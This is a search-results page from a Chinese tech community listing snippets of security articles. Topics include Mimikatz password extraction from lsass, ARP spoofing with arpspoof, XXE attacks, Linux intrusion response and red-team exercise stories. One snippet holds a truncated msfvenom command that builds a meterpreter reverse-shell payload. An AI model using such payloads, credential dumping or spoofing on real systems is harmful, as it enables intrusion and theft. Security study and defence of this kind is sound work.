首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Mimikatz获取系统密码攻防研究

通过它们可以提升进程权限、注入进程读取进程内存,可以直接从lsass中获取当前登录过系统用户的账号明文密码,lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后...本文以mimikatz最新版为例,介绍了mimikatz的参数、获取密码以及伪造黄金票据获取域控密码等用户,利用ms14-068结合mimikatz获取域控密码等,最后文中还给出了相应的防范方法,对网络攻防都具有一定的借鉴意义...,目前绝大部分操作系统为64位(支持大内存的使用)。...列出或者显示密钥 sc - 此命令列出系统上的智能卡/令牌读取器或将其移出系统。...下面是通过msfvenom生成shell: (1)Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=

3.6K40
您找到你想要的搜索结果了吗?
是的
没有找到

Linux 内核监控在 Android 攻防中的应用

在日常分析外部软件时,遇到的反调试/反注入防护已经越来越多,之前使用的基于 frida 的轻量级沙盒已经无法满足这类攻防水位的需要,因此需要有一种更加深入且通用的方式来对 APP 进行全面的监测和绕过。...strace strace 是 Linux 中一个知名的用户态系统调用跟踪工具,可以输入目标进程所执行的系统调用的名称以及参数,常用于快速的应用调试和诊断。...perf perf 是 Linux 发行版中提供的一个性能监控程序,基于内核提供的 perf_event_open 系统调用来对进程进行采样并获取信息。...Linux 中的 perf 子系统可以实现对 CPU 指令进行追踪和计数,以及收集 kprobe、uprobe 和 tracepoints 的信息,实现对系统性能的分析。...当然 ARM 模拟器也可以,但在攻防对抗的时可能需要进行额外的模拟器检测绕过。 笔者使用的是 Google Pixel 5,使用其他手机的话需要适当进行调整。 1.

3.1K30

Linux系统|Linux系统应急响应

目录 排查用户相关的信息 排查进程端口相关的信息 查找恶意程序并杀掉 斩草除根 判断入侵方式,修复漏洞 当我们被告知一台Linux服务器被黑客入侵,黑客利用该服务器进行挖矿...w #显示已经登陆系统的用户列表,并显示用户正在执行的指令 users #显示当前登录系统的所有用户的用户列表 last #查看最近登录成功的用户及信息...,查看的是 /var/log/wtmp 文件 lastb #查看最近登录失败的用户及信息,查看的是 /var/log/btmp 文件 lastlog #显示系统中所有用户最近一次登录信息...#查看爆破用户名字典 总的来说,黑客入侵主机有下列几种情况: 通过 redis 未授权漏洞入侵(好多挖矿程序是通过这个) ssh 弱口令暴力破解 Web 程序漏洞入侵 参考文章: 记一次Linux...木马清除过程 相关文章:Redis未授权访问漏洞 Linux挖矿病毒的清除与分析 Linux下性能监控、守护进程与计划任务管理 来源:

9.4K20

Linux内核级木马与病毒攻防:基础工具介绍

要想在Linux系统上开发或研究木马病毒等特殊程序,我们需要使用一系列强大的开发和调试攻击。本节先介绍几种在Linux系统上极为强大的工具。...第一个当然是gdb了,在Linux上,它是唯一能用于程序调试的利器。...; } 然后使用gcc编译成可执行文件,命令如下: gcc -Wall -g hello_world.c -o hello_world 注意到gcc也是在Linux上进行程序开发必不可少的编译器.../sys_read 然后可以看到如下信息,其中展示了程序对系统接口的调用情况统计: ? 使用如下命令可以查看程序在调用系统API Read 时读入的数据: strace -e read ....在linux系统上还有一系列虚拟系统文件或设备能用于读取当前运行进程的各种重要信息,例如先运行ubuntu系统上的firefox程序,然后使用pidof firefox查看他对应的进程id,在我机器上其

1.5K10

攻防演练 | 攻防在即,RASP为上

信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。...而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。...包括防火墙、IPS/ IDS、漏洞检测解决方案、嗅探、安全信息和事件管理(SIEM)系统,期望通过持续不断的检测分析数据活动,改善安全事件的检测。...但是,防火墙、IPS/ IDS基于流量检测的机制,容易造成攻击绕过;而且攻击者会通过渗透对服务器、操作系统和容器的加固应用程序平台进行攻击,势必会造成严重后果。...而且,RASP技术集合BAS技术可以在攻防演练活动中实现自动化检测,对安全威胁进行验证,确保安全链路完整。正因此,RASP技术可以更好的在攻防演练中发挥作用,确保防线安全,避免防守方丢分。​

54330

XXE攻防

你可以把XML理解为一个用来定义数据的东东,它是被设计用来进行数据的传输和存储,因此,两个采用不同技术的系统可以通过XML进行通信和交换数据。...如果你可以在应用程序响应中返回的数据值中使用定义的实体,那么你将能够在应用程序响应中查看来自 URL 的响应,从而获得与后端系统的双向交互。...在以下 XXE 示例中,外部实体将导致服务器向组织基础结构中的内部系统提出后端 HTTP 请求: <!DOCTYPE foo [ <!...这种情况很少发生,但在配置不当/开发内部应用情况下(PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上),攻击者能够通过XXE执行代码。...参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御

99920

LinuxLinux系统调用

Linux系统调用 前言 操作系统——管理计算机硬件与软件资源的软件,是用户和系统交互的操作接口,为它上面运行的程序提供服务。...操作系统内核——操作系统的内核,负责管理系统的进程、内存、设备驱动程序、文件和网络系统。一个内核不是一套完整的操作系统。例如LinuxLinux操作系统——基于Linux内核的操作系统。...通常由Linux内核、shell(特殊的应用程序,提供运行其他程序的接口)、文件系统和应用程序组成。常见的有:Redhat、Fedora、Centos、Ubuntu和Android等。...Linux的运行空间: Linux的运行空间:内核空间+用户空间 ---- 内核空间——存放的是整个内核代码和所有内核模块,以及内核所维护的数据。 用户空间——用户程序的代码和数据。...---- 系统调用的实现 通过软件中断实现。 **软件中断:**它是通过软件指令触发的中断。Linux系统内核响应软件中断,从用户态切换到内核态,执行相应的系统调用。

27.8K10

安全攻防-Kali linux 让对方断网(arp欺骗)

使用Kali Linux使用arpspoof命令进行arp欺骗 安装kali linux系统(这里装一个虚拟机即可,设置为网络桥接模式),安装过程细节自己百度,或者不明白可以问我,这里就不细说了。...2.启动kaili linux,打开终端使用:“ifconfig”命令查看当前使用的网卡名称,将网卡名称记录下来,这里“eth0”就是网卡名称了, root@kali:~# ifconfig ?...3.查找网关,在windows物理机上cmd中输入:”ipconfig“就可以看到网关了,其实在kali linux终端中已经显示出来了,borosdcast 192.168.1.255意思就是当前的网关为...4.在kaili linux终端中使用“nmap”命令查找网络中的其它主机ip地址,格式为:(这一步主要是找到你要收拾的小伙子的电脑ip,你不可能去问他吧!...最后说两句:虽然是局域网,但是也不要瞎搞不是,就当学习网络安全攻防的一个小实验吧!

9.1K30

攻防|记一次攻防案例总结

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦在某头部直辖市的攻防演练中,各家安全厂商投入了大量人力物力...而我方基本未做准备,只有小米加步枪,...且看如何不用0day如何连下数城前言几个月前打了一场某头部直辖市的攻防演练,演练当时通知的很急促,没做什么准备直接小米加步枪上阵了...在此过程中,很多个没用到0day的打点案例都很有意思,下面就简单分享一下案例一...sql=select+*+from+CONFIG_INFO+st可惜试了一下都配了策略,没法外网直接连过去但是...却发现了config信息中,出现了某系统的一个手机号随后加上微信钓鱼,以系统升级为由,...,拥有管理权限后面就很简单了,创建一个账户,把所有产品和平台的权限点满...然后,然后所有通过sso登录的系统都能访问到了案例五、兵不血刃打穿某高校为什么说兵不血刃呢...因为目标高校外网暴露面很小,基本上攻防演练期间能关的都关了但是目标高校正值开学季...,小姐姐没有改密码,直接进入到ssl vpn系统中在某个查看学生个人信息的系统重,队友的Burp被动扫描到了一个二级目录的swagger文档而“添加学生信息查看角色”的接口,竟然是没有鉴权的随后利用接口

55920

攻防』记一次EDU攻防演练

文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊...我敲了一大半的内网地址大部分都是些视频监控系统 信息收集 拿到目标表之后就是信息收集了,挑了几个目标fscan快速识别一波资产没啥东西呀,web页面有个内网地址泄露记一下,可以确定这个ip是在服务器段的...网络设备分数上限2k,之前无线ap已经把分数打满了,交了也是白交,继续看靶标系统和虚拟化平台,没有一个能可以打的,刚才的设备万能密码也没用。...总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈

1.1K40

攻防|记一次市级攻防演练

时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩...端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了...结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练

70961
领券